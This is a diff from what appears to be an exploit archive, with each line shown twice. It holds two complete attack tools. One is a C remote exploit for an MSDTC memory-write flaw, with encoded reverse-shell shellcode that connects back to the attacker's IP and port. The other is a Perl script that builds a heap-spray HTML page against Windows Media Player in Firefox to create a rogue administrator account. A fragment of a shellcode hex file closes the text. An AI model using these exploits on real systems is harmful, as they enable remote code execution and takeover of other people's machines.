(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00 }; (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00 };
char peer0_2[300] = { char peer0_2[300] = {
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xfd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd,
(char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0x24, (char)0x00, (char)0x8f, (char)0x00, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0x24, (char)0x00, (char)0x8f, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00 }; (char)0x00, (char)0x00, (char)0x00, (char)0x00 };
#define ip_offset (213+22) #define ip_offset (213+22)
#define port_offset (208+22) #define port_offset (208+22)
unsigned char realsc[] = unsigned char realsc[] =
"\xEB\x0F\x5B\x33\xC9\x66\xb9\xaa\x04\x80\x33\x99\x43\xE2\xFA\xEB" "\xEB\x0F\x5B\x33\xC9\x66\xb9\xaa\x04\x80\x33\x99\x43\xE2\xFA\xEB"
"\x05\xE8\xEC\xFF\xFF\xFF" "\x05\xE8\xEC\xFF\xFF\xFF"
"\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85" "\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A" "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A" "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC" "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58" "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12" "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71" "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3" "\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10" "\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12" "\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12"
"\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98" "\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98"
"\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE" "\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE"
"\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99" "\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99"
"\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65" "\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65"
"\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66" "\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66"
"\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC" "\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC"
"\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC" "\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC"
"\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED" "\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB" "\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB"
"\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA" "\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA"
"\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99"; "\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99";
struct ostype struct ostype
{ {
DWORD TopSEH; DWORD TopSEH;
char description[255]; char description[255];
}; };
ostype OS[] = { ostype OS[] = {
{0x684191c4, "Write NdrserverCall2 pointer From 0x990058"}, {0x684191c4, "Write NdrserverCall2 pointer From 0x990058"},
{0x684191c4, "Write NdrserverCall2 pointer From 0x980058"}, {0x684191c4, "Write NdrserverCall2 pointer From 0x980058"},
{0, NULL} {0, NULL}
}; };
DWORD BaseImage[]={0x990058, 0x980058}; DWORD BaseImage[]={0x990058, 0x980058};
void MakeShell(char *ip, int port) void MakeShell(char *ip, int port)
{ {
//make shellcode //make shellcode
unsigned short tp = htons(port)^(u_short)0x9999; unsigned short tp = htons(port)^(u_short)0x9999;
unsigned long ti = inet_addr(ip)^0x99999999; unsigned long ti = inet_addr(ip)^0x99999999;
memcpy(&realsc[port_offset], &tp, 2); memcpy(&realsc[port_offset], &tp, 2);
memcpy(&realsc[ip_offset], &ti, 4); memcpy(&realsc[ip_offset], &ti, 4);
} }
SOCKET ConnectTo(char *ip, int port) SOCKET ConnectTo(char *ip, int port)
{ {
WSADATA wsaData; WSADATA wsaData;
SOCKET s; SOCKET s;
struct hostent *he; struct hostent *he;
struct sockaddr_in host; struct sockaddr_in host;
int nTimeout = 5000; int nTimeout = 5000;
if(WSAStartup(0x0101,&wsaData) != 0) if(WSAStartup(0x0101,&wsaData) != 0)
{ {
printf("error starting winsock.."); printf("error starting winsock..");
exit(-1); exit(-1);
} }
if((he = gethostbyname(ip)) == 0) if((he = gethostbyname(ip)) == 0)
{ {
printf("Failed resolving '%s'", ip); printf("Failed resolving '%s'", ip);
exit(-1); exit(-1);
} }
host.sin_port = htons(port); host.sin_port = htons(port);
host.sin_family = AF_INET; host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr); host.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{ {
printf("Failed creating socket"); printf("Failed creating socket");
exit(-1); exit(-1);
} }
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1) if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{ {
printf("Failed connecting to host\r\n"); printf("Failed connecting to host\r\n");
exit(-1); exit(-1);
} }
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout)); setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
return s; return s;
} }
void Disconnect(SOCKET s) void Disconnect(SOCKET s)
{ {
closesocket(s); closesocket(s);
WSACleanup(); WSACleanup();
} }
void WriteFakeLength(DWORD fakelen) //should > 0x22b void WriteFakeLength(DWORD fakelen) //should > 0x22b
{ {
*(DWORD*)(peer0_1+15*8) = fakelen/2; *(DWORD*)(peer0_1+15*8) = fakelen/2;
} }
void BuildShell(char *ip, int port) void BuildShell(char *ip, int port)
{ {
MakeShell(ip, port); MakeShell(ip, port);
memcpy(peer0_1 + 132, realsc, sizeof(realsc)); memcpy(peer0_1 + 132, realsc, sizeof(realsc));
} }
void BuildContext(char*ip, int port) void BuildContext(char*ip, int port)
{ {
SOCKET s = ConnectTo(ip, port); SOCKET s = ConnectTo(ip, port);
//SOCKET s = ConnectTo("202.119.9.191", 2288); //SOCKET s = ConnectTo("202.119.9.191", 2288);
send(s, peer0_0, sizeof(peer0_0), 0); send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000]; char buf[5000];
WriteFakeLength(1200); WriteFakeLength(1200);
recv(s, buf, sizeof(buf), 0); recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0); send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0); send(s, peer0_2, sizeof(peer0_2), 0);
memset(buf, 0, sizeof(buf)); memset(buf, 0, sizeof(buf));
recv(s, buf, sizeof(buf), 0); recv(s, buf, sizeof(buf), 0);
Disconnect(s); Disconnect(s);
if(buf[8] != 0x5c) if(buf[8] != 0x5c)
{ {
printf("Target not support! Quiting...."); printf("Target not support! Quiting....");
exit(0); exit(0);
} }
Sleep(500); Sleep(500);
} }
void help(char *n) void help(char *n)
{ {
printf("-=[ SST ]=------------------------------------\n"); printf("-=[ SST ]=------------------------------------\n");
printf(" MSDTC Arbitrary Opposite Memory Write Flaw\n"); printf(" MSDTC Arbitrary Opposite Memory Write Flaw\n");
printf("----------------------------------------------\n"); printf("----------------------------------------------\n");
printf("Usage:\n"); printf("Usage:\n");
printf(" %s [Taget IP] [Target Port] [Your IP] [Your Port] <type>\n\ntype:\n", n); printf(" %s [Taget IP] [Target Port] [Your IP] [Your Port] <type>\n\ntype:\n", n);
int i=0; int i=0;
while(OS[i].TopSEH) while(OS[i].TopSEH)
{ {
printf(" %d %s\n", i, OS[i].description); printf(" %d %s\n", i, OS[i].description);
i++; i++;
} }
} }
void main(int argc, char *argv[]) void main(int argc, char *argv[])
{ {
if(argc < 5) if(argc < 5)
{ {
help(argv[0]); help(argv[0]);
return; return;
} }
int itype = 0; int itype = 0;
int b = 0; int b = 0;
if(argc == 5) if(argc == 5)
b = atoi(argv[5]); b = atoi(argv[5]);
char *ip = argv[1]; char *ip = argv[1];
int port = atoi(argv[2]); int port = atoi(argv[2]);
printf("(^_^) Start exploiting journey!\n"); printf("(^_^) Start exploiting journey!\n");
//build context, copy shellcode to heap //build context, copy shellcode to heap
BuildContext(ip, port); BuildContext(ip, port);
BuildContext(ip, port); BuildContext(ip, port);
BuildContext(ip, port); BuildContext(ip, port);
BuildShell(argv[3], atoi(argv[4])); BuildShell(argv[3], atoi(argv[4]));
BuildContext(ip, port); BuildContext(ip, port);
BuildContext(ip, port); BuildContext(ip, port);
BuildContext(ip, port); BuildContext(ip, port);
//finish building //finish building
printf("(^_^) Context built!\n"); printf("(^_^) Context built!\n");
SOCKET s = ConnectTo(ip, port); SOCKET s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0); send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000]; char buf[5000];
WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4); WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4);
recv(s, buf, sizeof(buf), 0); recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0); send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0); send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s); Disconnect(s);
printf("(^_^) Function pointer wrote!\n"); printf("(^_^) Function pointer wrote!\n");
//trigger //trigger
printf("(*_*) Trigger fault..."); printf("(*_*) Trigger fault...");
Sleep(500); Sleep(500);
s = ConnectTo(ip, port); s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0); send(s, peer0_0, sizeof(peer0_0), 0);
//WriteFakeLength(0x80811102-BaseImage[b]-4); //WriteFakeLength(0x80811102-BaseImage[b]-4);
WriteFakeLength(0x226); WriteFakeLength(0x226);
recv(s, buf, sizeof(buf), 0); recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0); send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0); send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s); Disconnect(s);
printf("Done!\n(*_*) Any shell?"); printf("Done!\n(*_*) Any shell?");
} }
// milw0rm.com [2005-12-01] // milw0rm.com [2005-12-01]

242
platforms/windows/remote/1520.pl
View file

@ -1,121 +1,121 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# wmp-profiteer.pl # wmp-profiteer.pl
# Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit # Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit
# By Matthew Murphy (mattmurphy@kc.rr.com) # By Matthew Murphy (mattmurphy@kc.rr.com)
# #
# It's come to my attention that the HTML versions of the exploit posted on # It's come to my attention that the HTML versions of the exploit posted on
# several sites have become mangled. Notables include SecuriTeam and FrSIRT. # several sites have become mangled. Notables include SecuriTeam and FrSIRT.
# Neither one, though, can beat SecurityFocus, whose links to the exploits # Neither one, though, can beat SecurityFocus, whose links to the exploits
# for this issue are both 404s. # for this issue are both 404s.
# #
# I haven't updated the underlying exploit methodology -- it's still a shameless # I haven't updated the underlying exploit methodology -- it's still a shameless
# rip of Skylined's heap spray technique, but now the shellcode can be # rip of Skylined's heap spray technique, but now the shellcode can be
# customized! # customized!
# #
# The usage of this tool is as follows: # The usage of this tool is as follows:
# #
# wmp-profiteer.pl [shellcode] # wmp-profiteer.pl [shellcode]
# #
# The shellcode that comes with this has the same payload as the original. # The shellcode that comes with this has the same payload as the original.
# If it's successful against you, you'll have an administrator account named # If it's successful against you, you'll have an administrator account named
# 'wmp0wn3d' with a password of 'password'. This, of course, assumes that # 'wmp0wn3d' with a password of 'password'. This, of course, assumes that
# you're running the vulnerable application as an administrator. There's a # you're running the vulnerable application as an administrator. There's a
# lesson in that: run as a Limited User or at least tie down your browsers # lesson in that: run as a Limited User or at least tie down your browsers
# with Software Restriction. # with Software Restriction.
# #
# This will drop 'wmp-exploit.html' in the current directory. When the HTML # This will drop 'wmp-exploit.html' in the current directory. When the HTML
# document is opened locally or viewed remotely by a vulnerable web browser # document is opened locally or viewed remotely by a vulnerable web browser
# (Firefox on Windows), the exploit code will run and gain control of the # (Firefox on Windows), the exploit code will run and gain control of the
# browser. # browser.
# #
# The standard disclaimer from the original exploit still applies, with some # The standard disclaimer from the original exploit still applies, with some
# changes: # changes:
# #
# This exploit code is intended only as a demonstration tool for # This exploit code is intended only as a demonstration tool for
# educational or testing purposes. It is not intended to be used for any # educational or testing purposes. It is not intended to be used for any
# unauthorized or illicit purpose. Any testing done with this tool OR ANY # unauthorized or illicit purpose. Any testing done with this tool OR ANY
# PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or # PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or
# are explicitly authorized to test. # are explicitly authorized to test.
# #
# By utilizing or possessing this code, you assume any and all # By utilizing or possessing this code, you assume any and all
# responsibility for damage that results. The author will not be held # responsibility for damage that results. The author will not be held
# responsible, under any circumstances, for damage that arises from your # responsible, under any circumstances, for damage that arises from your
# possession or use of this code. # possession or use of this code.
$part1 = $part1 =
"<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\"> "<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\">
<HTML> <HTML>
<HEAD> <HEAD>
<TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE> <TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE>
<SCRIPT> <SCRIPT>
var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\"); var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\");
do { do {
spray += spray; spray += spray;
} while (spray.length < 0x1000000); } while (spray.length < 0x1000000);
spray += unescape(\""; spray += unescape(\"";
$part2 = $part2 =
"\"); "\");
</SCRIPT> </SCRIPT>
</HEAD> </HEAD>
<BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\"> <BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\">
<EMBED SRC=\""; <EMBED SRC=\"";
$part3 = $part3 =
"\"></EMBED> "\"></EMBED>
</BODY> </BODY>
</HTML>"; </HTML>";
if (@ARGV != 1) { if (@ARGV != 1) {
print STDERR "Usage: $0 [shellcode file]"; print STDERR "Usage: $0 [shellcode file]";
} }
open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html for writing."; open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html for writing.";
print EXPLOIT $part1; print EXPLOIT $part1;
open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found."; open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found.";
while (!eof(SHELLCODE)) { while (!eof(SHELLCODE)) {
$ch1 = getc(SHELLCODE); $ch1 = getc(SHELLCODE);
if (eof(SHELLCODE)) { if (eof(SHELLCODE)) {
print EXPLOIT "%u00"; print EXPLOIT "%u00";
print EXPLOIT sprintf("%%u00%.2x", ord($ch1)); print EXPLOIT sprintf("%%u00%.2x", ord($ch1));
} else { } else {
$ch2 = getc(SHELLCODE); $ch2 = getc(SHELLCODE);
print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1)); print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1));
} }
} }
close(SHELLCODE); close(SHELLCODE);
print EXPLOIT $part2; print EXPLOIT $part2;
print EXPLOIT "-"x2038; print EXPLOIT "-"x2038;
print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL"; print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL";
print EXPLOIT "AAA\x05"; print EXPLOIT "AAA\x05";
print EXPLOIT "NNNNOOOO"; print EXPLOIT "NNNNOOOO";
print EXPLOIT "AAA\x05"; print EXPLOIT "AAA\x05";
print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"; print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv";
print EXPLOIT $part3; print EXPLOIT $part3;
close(EXPLOIT); close(EXPLOIT);
----------------------------------------------- shellcode.hex ----------------------------------------- ----------------------------------------------- shellcode.hex -----------------------------------------
:020000040000FA :020000040000FA
:100000002BC983E9C9D9EED97424F45B8173132118 :100000002BC983E9C9D9EED97424F45B8173132118
